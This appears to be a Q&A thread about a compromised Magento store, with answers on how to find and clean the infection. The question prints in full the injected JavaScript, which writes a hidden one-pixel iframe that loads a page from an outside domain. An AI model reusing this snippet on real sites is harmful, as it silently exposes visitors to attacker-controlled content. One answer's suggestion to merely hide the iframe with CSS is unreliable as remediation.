# Clients magento website contains malicious code, how to get rid of it?

Tags: javascript, magento, malware

My client called me today, telling me that some features in the backend suddenly stopped working. After taking a quick look, I saw that the website contained malicious code below the last html tag.. This is the code:

```
<script type="text/javascript">     
    (function () {
        var zg = document.createElement('iframe');
        zg.src = 'http://impactrl.de/chat/esd.php';
        zg.style.position = 'absolute';
        zg.style.border = '0';    zg.style.height = '1px';
        zg.style.width = '1px';    zg.style.left = '1px';
        zg.style.top = '1px';
        if (!document.getElementById('zg')) {
            document.write('<div id=\'zg\'></div>');
            document.getElementById('zg').appendChild(zg);
        }})();
</script>
```

My client also told me he downloaded some software that allowed him to run his store from his desktop. My bet is that this is the problem.

However, I would like to get rid of that piece of code, but I cannot find it in any file. Its on all the backend AND frontend pages.

Does anyone know in what file I have to look ?

Comment: is that the whole block of "malicious code"

Comment: Yes that is all, however it links to some german website which asks for Login , it may not harm anything but it sure is annoying and it breaks up the backend

Comment: So someone inserted an iframe in all the files. How about plugging the gaping security hole before trying to get rid of the javascript.

Comment: Well if it's in all the files then i must be blind.. i cannot find it, i also recommended to get rid of the software

Comment: I guess the website isn't public? Otherwise you should post the link.

Comment: http://www.retroscooteronderdelen.nl is the website

Comment: I think you need to completely flatten the server and reinstall clean software. Trying to remove malware surgically is not a good idea ever.

Comment: Should put in your post :p

Answer (score 1, accepted):

This is a prime example of why you frequently and always back up your website's code base and database. In reality, if you don't know where the code's coming from, you don't also know if there have been multiple insertion points and other stuff messed with. Change all login and access credentials (ssh, ftp, mysql, cPanel, the computer used for maintenance (good site cracks start at home, scan for malware), wipe the system down and reinstall.

Setting that aside as 100% hindsight and if you're looking for where this is coming from:

First step is to `grep` (`man grep` at your ssh prompt for instructions on using `grep`) your code base (basically any text file, not just Magento's, anything can be included from anywhere on the server) . You have to look not only for strings found in the exploit but also for signs of inserted obfusticated code as most site crackers want a bit longer life on the code staying around. The less obvious and easy to find, the better.

Second step is to `diff` against a fresh code base if this site is close to stock, you can install in a separate folder a fresh unzip of the Magento version you're running and then do a `diff` on the main directories between the live install and the fresh code base to look for all files that are different. [Inchoo has an article on using grep to look for code diferences.](http://inchoo.net/ecommerce/magento/quickly-check-if-magento-core-files-are-modified/) Basic command to work with is `diff -qrbB contaminated\code\location fresh\code\location` Also `diff` against older stored copies of your custom template.

Third step is to consider that it might not be in any template file. You're either looking at a compromised login where someone has used the backend to put code in one of several page configuration text areas meant for code inclusion, added a CMS block and then a reference to it, got it into the system through a drive-by code insertion, got something inserted into the database for an XSS code include from another website or if you've got an external exposed port to MySQL, has the database login credentials and can insert anything at will. Doing a database dump and `grep`ing the SQL code for strings is once again another tool to find these.

Answer (score 1):

This stinks of a much larger problem.  If you've found unknown code in your website that pulls resources from an unknown server, **you have a security problem**.  A security problem is bad enough news, but it's a completely unacceptable situation on a site that's doing ecommerce.

The only safe thing to do at this point is wipe your server and install from scratch.  Make sure you use an up-to-date and fully patched OS, Apache, PHP, and Magento install.

If you have backups (I hope you do), a good place to start might be a backup from before anything went amiss.  Take your server offline, restore the backup, then update all your components to the most recent versions.  Only then is it safe to take the server back online.

Comment: Well i guess this is the only option. Im glad i got some backups ^^.. however, i have never been in such a situation, and i dont know who's fault this is... is this my fault or my clients fault? Because if it is my fault i don't want to charge him for the extra work

Comment: It's hard to say.  Maybe your client installed something (does he have full access to the web server?), or maybe a security hole in out-of-date software allowed someone to hack your server.  Given the fact that [*impactrl.de* is referenced on a large number of unrelated domains](https://www.google.com/search?q=impactrl.de), I'd wager this is part of some kind of automated attack against a known vulnerability -- most likely in Magento.

Answer (score 1):

Had exactly the same issue on a client's page and it was infected with *JS/BlacoleRef.F.3*. 
I am also not using Magento, so I guess the problem is not linked with it. So I just restored the corrupted HTML files and it apparently worked for now.

Answer (score 0):

You should definately find a way to prevent it from being inserted into the DOM! In Chrome you have a nice Resource overview in the Inspector.

For safety sake, you could check for other iframes in your pages, and add in some common.css `#zg{ display: none; }`. Or,

If you have multipe iFrames you can use JS and use `document.getElementsByTagName("IFRAME")` and loop through them, and remove the one that has the specified src value.

Update:
Chrome verifies that this is added in every JS file. I interprete that as it is send from the server with this. I dont believe it is JS related.

[image]

Comment: I could remove it with some CSS yes, but then it would still be somewhere in a file.. i just need to know what file it is ^^ , checked all the template files, its not in there :(

Comment: Did you not reach it till the part where I suggested using the Inspector? It's useful already! :o

Comment: Sorry i dont really understand, inspector doesnt give me any new info

Comment: I'm just saying it's not javascript related, bc you tagged JS. This example is a bit elaborate to add as comment.